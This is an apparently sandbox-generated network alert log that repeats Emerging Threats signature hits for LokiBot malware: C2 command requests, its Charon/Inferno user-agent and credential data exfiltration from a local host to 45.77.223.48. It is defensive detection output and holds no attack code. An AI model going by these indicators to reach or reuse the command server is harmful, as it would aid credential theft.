                                              04/25/24-09:43:43.798730TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983080192.168.2.445.77.223.48
                                              04/25/24-09:43:43.798730TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983080192.168.2.445.77.223.48
                                              04/25/24-09:43:57.993136TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983980192.168.2.445.77.223.48
                                              04/25/24-09:42:47.218743TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978780192.168.2.445.77.223.48
                                              04/25/24-09:42:22.438278TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976980192.168.2.445.77.223.48
                                              04/25/24-09:42:04.713098TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975480192.168.2.445.77.223.48
                                              04/25/24-09:42:26.688177TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977280192.168.2.445.77.223.48
                                              04/25/24-09:42:08.607822TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975780192.168.2.445.77.223.48
                                              04/25/24-09:42:26.688177TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977280192.168.2.445.77.223.48
                                              04/25/24-09:42:08.607822TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975780192.168.2.445.77.223.48
                                              04/25/24-09:43:48.680283TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983480192.168.2.445.77.223.48
                                              04/25/24-09:42:37.405098TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978080192.168.2.445.77.223.48
                                              04/25/24-09:42:58.404316TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979780192.168.2.445.77.223.48
                                              04/25/24-09:43:22.887850TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981680192.168.2.445.77.223.48
                                              04/25/24-09:43:30.405107TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982280192.168.2.445.77.223.48
                                              04/25/24-09:42:02.263836TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974980192.168.2.445.77.223.48
                                              04/25/24-09:42:43.818013TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978580192.168.2.445.77.223.48
                                              04/25/24-09:42:07.189244TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975680192.168.2.445.77.223.48
                                              04/25/24-09:42:13.826993TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976280192.168.2.445.77.223.48
                                              04/25/24-09:42:37.405098TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978080192.168.2.445.77.223.48
                                              04/25/24-09:43:30.405107TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982280192.168.2.445.77.223.48
                                              04/25/24-09:42:36.181912TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977980192.168.2.445.77.223.48
                                              04/25/24-09:42:36.181912TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977980192.168.2.445.77.223.48
                                              04/25/24-09:43:36.805880TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982780192.168.2.445.77.223.48
                                              04/25/24-09:42:43.818013TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978580192.168.2.445.77.223.48
                                              04/25/24-09:42:19.955290TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976780192.168.2.445.77.223.48
                                              04/25/24-09:43:11.469231TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980780192.168.2.445.77.223.48
                                              04/25/24-09:43:22.887850TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981680192.168.2.445.77.223.48
                                              04/25/24-09:42:55.953898TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979580192.168.2.445.77.223.48
                                              04/25/24-09:43:35.562440TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982680192.168.2.445.77.223.48
                                              04/25/24-09:43:49.906919TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983580192.168.2.445.77.223.48
                                              04/25/24-09:43:27.987761TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982080192.168.2.445.77.223.48
                                              04/25/24-09:43:49.906919TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983580192.168.2.445.77.223.48
                                              04/25/24-09:43:31.634111TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982380192.168.2.445.77.223.48
                                              04/25/24-09:43:27.987761TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982080192.168.2.445.77.223.48
                                              04/25/24-09:43:24.107780TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981780192.168.2.445.77.223.48
                                              04/25/24-09:43:20.366841TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981480192.168.2.445.77.223.48
                                              04/25/24-09:43:12.681066TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980880192.168.2.445.77.223.48
                                              04/25/24-09:43:24.107780TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981780192.168.2.445.77.223.48
                                              04/25/24-09:42:17.524612TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976580192.168.2.445.77.223.48
                                              04/25/24-09:43:52.470303TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983780192.168.2.445.77.223.48
                                              04/25/24-09:42:17.524612TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976580192.168.2.445.77.223.48
                                              04/25/24-09:42:48.461124TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978880192.168.2.445.77.223.48
                                              04/25/24-09:43:11.469231TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980780192.168.2.445.77.223.48
                                              04/25/24-09:42:54.719782TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979480192.168.2.445.77.223.48
                                              04/25/24-09:42:01.045653TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974780192.168.2.445.77.223.48
                                              04/25/24-09:43:04.035271TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980180192.168.2.445.77.223.48
                                              04/25/24-09:43:25.348509TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981880192.168.2.445.77.223.48
                                              04/25/24-09:43:51.138012TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983680192.168.2.445.77.223.48
                                              04/25/24-09:41:57.336379TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973580192.168.2.445.77.223.48
                                              04/25/24-09:43:04.035271TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980180192.168.2.445.77.223.48
                                              04/25/24-09:42:32.329146TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977680192.168.2.445.77.223.48
                                              04/25/24-09:42:48.461124TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978880192.168.2.445.77.223.48
                                              04/25/24-09:42:01.045653TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974780192.168.2.445.77.223.48
                                              04/25/24-09:43:51.138012TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983680192.168.2.445.77.223.48
                                              04/25/24-09:43:36.805880TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982780192.168.2.445.77.223.48
                                              04/25/24-09:43:32.856501TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982480192.168.2.445.77.223.48
                                              04/25/24-09:42:38.643235TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978180192.168.2.445.77.223.48
                                              04/25/24-09:42:42.452935TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978480192.168.2.445.77.223.48
                                              04/25/24-09:43:57.993136TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983980192.168.2.445.77.223.48
                                              04/25/24-09:42:42.452935TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978480192.168.2.445.77.223.48
                                              04/25/24-09:43:43.798730TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983080192.168.2.445.77.223.48
                                              04/25/24-09:42:34.955343TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977880192.168.2.445.77.223.48
                                              04/25/24-09:42:34.955343TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977880192.168.2.445.77.223.48
                                              04/25/24-09:42:15.058675TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976380192.168.2.445.77.223.48
                                              04/25/24-09:42:18.729353TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976680192.168.2.445.77.223.48
                                              04/25/24-09:42:22.438278TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976980192.168.2.445.77.223.48
                                              04/25/24-09:42:22.438278TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976980192.168.2.445.77.223.48
                                              04/25/24-09:42:31.102796TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977580192.168.2.445.77.223.48
                                              04/25/24-09:42:08.607822TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975780192.168.2.445.77.223.48
                                              04/25/24-09:42:31.102796TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977580192.168.2.445.77.223.48
                                              04/25/24-09:42:38.643235TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978180192.168.2.445.77.223.48
                                              04/25/24-09:42:26.688177TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977280192.168.2.445.77.223.48
                                              04/25/24-09:43:08.999268TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980580192.168.2.445.77.223.48
                                              04/25/24-09:43:12.681066TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980880192.168.2.445.77.223.48
                                              04/25/24-09:42:58.404316TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979780192.168.2.445.77.223.48
                                              04/25/24-09:43:16.392996TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981180192.168.2.445.77.223.48
                                              04/25/24-09:43:35.562440TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982680192.168.2.445.77.223.48
                                              04/25/24-09:42:58.404316TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979780192.168.2.445.77.223.48
                                              04/25/24-09:42:07.189244TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975680192.168.2.445.77.223.48
                                              04/25/24-09:43:15.173099TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981080192.168.2.445.77.223.48
                                              04/25/24-09:42:50.920365TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979180192.168.2.445.77.223.48
                                              04/25/24-09:42:13.826993TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976280192.168.2.445.77.223.48
                                              04/25/24-09:43:47.479485TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983380192.168.2.445.77.223.48
                                              04/25/24-09:43:57.993136TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983980192.168.2.445.77.223.48
                                              04/25/24-09:42:07.189244TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975680192.168.2.445.77.223.48
                                              04/25/24-09:42:36.181912TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977980192.168.2.445.77.223.48
                                              04/25/24-09:43:15.173099TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981080192.168.2.445.77.223.48
                                              04/25/24-09:43:07.780738TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980480192.168.2.445.77.223.48
                                              04/25/24-09:42:13.826993TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976280192.168.2.445.77.223.48
                                              04/25/24-09:42:43.818013TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978580192.168.2.445.77.223.48
                                              04/25/24-09:42:09.977319TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975880192.168.2.445.77.223.48
                                              04/25/24-09:42:12.423265TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976180192.168.2.445.77.223.48
                                              04/25/24-09:42:09.977319TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975880192.168.2.445.77.223.48
                                              04/25/24-09:42:12.423265TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976180192.168.2.445.77.223.48
                                              04/25/24-09:43:11.469231TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980780192.168.2.445.77.223.48
                                              04/25/24-09:42:05.989811TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975580192.168.2.445.77.223.48
                                              04/25/24-09:43:56.719260TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983880192.168.2.445.77.223.48
                                              04/25/24-09:43:49.906919TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983580192.168.2.445.77.223.48
                                              04/25/24-09:43:41.014214TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982880192.168.2.445.77.223.48
                                              04/25/24-09:43:31.634111TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982380192.168.2.445.77.223.48
                                              04/25/24-09:43:27.987761TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982080192.168.2.445.77.223.48
                                              04/25/24-09:43:31.634111TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982380192.168.2.445.77.223.48
                                              04/25/24-09:42:59.746040TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979880192.168.2.445.77.223.48
                                              04/25/24-09:42:25.250536TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977180192.168.2.445.77.223.48
                                              04/25/24-09:43:05.247702TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980280192.168.2.445.77.223.48
                                              04/25/24-09:43:24.107780TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981780192.168.2.445.77.223.48
                                              04/25/24-09:43:45.029471TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983180192.168.2.445.77.223.48
                                              04/25/24-09:42:25.250536TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977180192.168.2.445.77.223.48
                                              04/25/24-09:43:45.029471TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983180192.168.2.445.77.223.48
                                              04/25/24-09:42:17.524612TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976580192.168.2.445.77.223.48
                                              04/25/24-09:43:34.305329TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982580192.168.2.445.77.223.48
                                              04/25/24-09:42:41.192422TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978380192.168.2.445.77.223.48
                                              04/25/24-09:43:18.909479TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981380192.168.2.445.77.223.48
                                              04/25/24-09:42:01.045653TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974780192.168.2.445.77.223.48
                                              04/25/24-09:42:48.461124TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978880192.168.2.445.77.223.48
                                              04/25/24-09:42:32.329146TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977680192.168.2.445.77.223.48
                                              04/25/24-09:43:18.909479TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981380192.168.2.445.77.223.48
                                              04/25/24-09:42:32.329146TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977680192.168.2.445.77.223.48
                                              04/25/24-09:43:25.348509TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981880192.168.2.445.77.223.48
                                              04/25/24-09:42:54.719782TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979480192.168.2.445.77.223.48
                                              04/25/24-09:42:54.719782TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979480192.168.2.445.77.223.48
                                              04/25/24-09:41:57.336379TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14973580192.168.2.445.77.223.48
                                              04/25/24-09:42:57.200454TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979680192.168.2.445.77.223.48
                                              04/25/24-09:43:25.348509TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981880192.168.2.445.77.223.48
                                              04/25/24-09:41:57.336379TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24973580192.168.2.445.77.223.48
                                              04/25/24-09:43:21.643851TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981580192.168.2.445.77.223.48
                                              04/25/24-09:43:17.642261TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981280192.168.2.445.77.223.48
                                              04/25/24-09:42:34.955343TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977880192.168.2.445.77.223.48
                                              04/25/24-09:42:57.200454TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979680192.168.2.445.77.223.48
                                              04/25/24-09:42:15.058675TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976380192.168.2.445.77.223.48
                                              04/25/24-09:42:18.729353TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976680192.168.2.445.77.223.48
                                              04/25/24-09:43:06.504867TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980380192.168.2.445.77.223.48
                                              04/25/24-09:43:06.504867TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980380192.168.2.445.77.223.48
                                              04/25/24-09:42:31.102796TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977580192.168.2.445.77.223.48
                                              04/25/24-09:43:02.240601TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980080192.168.2.445.77.223.48
                                              04/25/24-09:43:08.999268TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980580192.168.2.445.77.223.48
                                              04/25/24-09:42:15.058675TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976380192.168.2.445.77.223.48
                                              04/25/24-09:43:12.681066TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980880192.168.2.445.77.223.48
                                              04/25/24-09:42:18.729353TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976680192.168.2.445.77.223.48
                                              04/25/24-09:42:38.643235TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978180192.168.2.445.77.223.48
                                              04/25/24-09:43:02.240601TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980080192.168.2.445.77.223.48
                                              04/25/24-09:41:59.827008TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974580192.168.2.445.77.223.48
                                              04/25/24-09:43:16.392996TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981180192.168.2.445.77.223.48
                                              04/25/24-09:42:29.915605TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977480192.168.2.445.77.223.48
                                              04/25/24-09:42:50.920365TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979180192.168.2.445.77.223.48
                                              04/25/24-09:42:45.849788TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978680192.168.2.445.77.223.48
                                              04/25/24-09:43:08.999268TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980580192.168.2.445.77.223.48
                                              04/25/24-09:42:21.173515TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976880192.168.2.445.77.223.48
                                              04/25/24-09:43:16.392996TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981180192.168.2.445.77.223.48
                                              04/25/24-09:42:21.173515TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976880192.168.2.445.77.223.48
                                              04/25/24-09:42:29.915605TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977480192.168.2.445.77.223.48
                                              04/25/24-09:43:56.719260TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983880192.168.2.445.77.223.48
                                              04/25/24-09:43:13.935226TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980980192.168.2.445.77.223.48
                                              04/25/24-09:42:28.624649TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977380192.168.2.445.77.223.48
                                              04/25/24-09:43:47.479485TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983380192.168.2.445.77.223.48
                                              04/25/24-09:43:07.780738TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980480192.168.2.445.77.223.48
                                              04/25/24-09:42:50.920365TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979180192.168.2.445.77.223.48
                                              04/25/24-09:43:47.479485TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983380192.168.2.445.77.223.48
                                              04/25/24-09:43:15.173099TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981080192.168.2.445.77.223.48
                                              04/25/24-09:42:05.989811TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975580192.168.2.445.77.223.48
                                              04/25/24-09:42:16.290446TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976480192.168.2.445.77.223.48
                                              04/25/24-09:42:03.512691TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975280192.168.2.445.77.223.48
                                              04/25/24-09:42:09.977319TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975880192.168.2.445.77.223.48
                                              04/25/24-09:42:28.624649TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977380192.168.2.445.77.223.48
                                              04/25/24-09:42:02.263836TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974980192.168.2.445.77.223.48
                                              04/25/24-09:42:12.423265TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976180192.168.2.445.77.223.48
                                              04/25/24-09:42:28.624649TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977380192.168.2.445.77.223.48
                                              04/25/24-09:42:05.989811TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975580192.168.2.445.77.223.48
                                              04/25/24-09:42:16.290446TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976480192.168.2.445.77.223.48
                                              04/25/24-09:42:23.788777TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977080192.168.2.445.77.223.48
                                              04/25/24-09:43:26.739380TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981980192.168.2.445.77.223.48
                                              04/25/24-09:43:46.244048TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983280192.168.2.445.77.223.48
                                              04/25/24-09:42:59.746040TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979880192.168.2.445.77.223.48
                                              04/25/24-09:42:49.681959TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978980192.168.2.445.77.223.48
                                              04/25/24-09:43:41.014214TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982880192.168.2.445.77.223.48
                                              04/25/24-09:42:59.746040TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979880192.168.2.445.77.223.48
                                              04/25/24-09:42:49.681959TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978980192.168.2.445.77.223.48
                                              04/25/24-09:42:33.541899TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977780192.168.2.445.77.223.48
                                              04/25/24-09:42:04.713098TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975480192.168.2.445.77.223.48
                                              04/25/24-09:42:25.250536TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977180192.168.2.445.77.223.48
                                              04/25/24-09:43:34.305329TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982580192.168.2.445.77.223.48
                                              04/25/24-09:43:05.247702TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980280192.168.2.445.77.223.48
                                              04/25/24-09:42:04.713098TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975480192.168.2.445.77.223.48
                                              04/25/24-09:42:41.192422TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978380192.168.2.445.77.223.48
                                              04/25/24-09:42:41.192422TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978380192.168.2.445.77.223.48
                                              04/25/24-09:43:34.305329TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982580192.168.2.445.77.223.48
                                              04/25/24-09:43:45.029471TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983180192.168.2.445.77.223.48
                                              04/25/24-09:43:05.247702TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980280192.168.2.445.77.223.48
                                              04/25/24-09:42:11.222525TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975980192.168.2.445.77.223.48
                                              04/25/24-09:43:42.568421TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982980192.168.2.445.77.223.48
                                              04/25/24-09:43:10.231973TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980680192.168.2.445.77.223.48
                                              04/25/24-09:42:39.921949TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978280192.168.2.445.77.223.48
                                              04/25/24-09:41:58.700835TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24974180192.168.2.445.77.223.48
                                              04/25/24-09:42:39.921949TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978280192.168.2.445.77.223.48
                                              04/25/24-09:43:18.909479TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981380192.168.2.445.77.223.48
                                              04/25/24-09:41:58.700835TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14974180192.168.2.445.77.223.48
                                              04/25/24-09:43:29.212593TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982180192.168.2.445.77.223.48
                                              04/25/24-09:42:53.510184TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979380192.168.2.445.77.223.48
                                              04/25/24-09:43:00.985732TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979980192.168.2.445.77.223.48
                                              04/25/24-09:43:00.985732TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979980192.168.2.445.77.223.48
                                              04/25/24-09:43:17.642261TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981280192.168.2.445.77.223.48
                                              04/25/24-09:43:29.212593TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982180192.168.2.445.77.223.48
                                              04/25/24-09:42:57.200454TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979680192.168.2.445.77.223.48
                                              04/25/24-09:43:21.643851TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981580192.168.2.445.77.223.48
                                              04/25/24-09:43:17.642261TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981280192.168.2.445.77.223.48
                                              04/25/24-09:42:47.218743TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978780192.168.2.445.77.223.48
                                              04/25/24-09:43:10.231973TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980680192.168.2.445.77.223.48
                                              04/25/24-09:43:06.504867TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980380192.168.2.445.77.223.48
                                              04/25/24-09:43:02.240601TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980080192.168.2.445.77.223.48
                                              04/25/24-09:42:29.915605TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977480192.168.2.445.77.223.48
                                              04/25/24-09:41:59.827008TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974580192.168.2.445.77.223.48
                                              04/25/24-09:42:45.849788TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978680192.168.2.445.77.223.48
                                              04/25/24-09:43:41.014214TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982880192.168.2.445.77.223.48
                                              04/25/24-09:42:21.173515TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976880192.168.2.445.77.223.48
                                              04/25/24-09:42:37.405098TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978080192.168.2.445.77.223.48
                                              04/25/24-09:42:45.849788TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978680192.168.2.445.77.223.48
                                              04/25/24-09:42:52.171897TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979280192.168.2.445.77.223.48
                                              04/25/24-09:43:48.680283TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983480192.168.2.445.77.223.48
                                              04/25/24-09:41:59.827008TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974580192.168.2.445.77.223.48
                                              04/25/24-09:43:48.680283TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983480192.168.2.445.77.223.48
                                              04/25/24-09:42:52.171897TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979280192.168.2.445.77.223.48
                                              04/25/24-09:43:13.935226TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980980192.168.2.445.77.223.48
                                              04/25/24-09:43:56.719260TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983880192.168.2.445.77.223.48
                                              04/25/24-09:43:30.405107TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982280192.168.2.445.77.223.48
                                              04/25/24-09:43:13.935226TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980980192.168.2.445.77.223.48
                                              04/25/24-09:43:21.643851TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981580192.168.2.445.77.223.48
                                              TimestampSource PortDest PortSource IPDest IP
                                              Apr 25, 2024 09:41:57.201052904 CEST4973580192.168.2.445.77.223.48
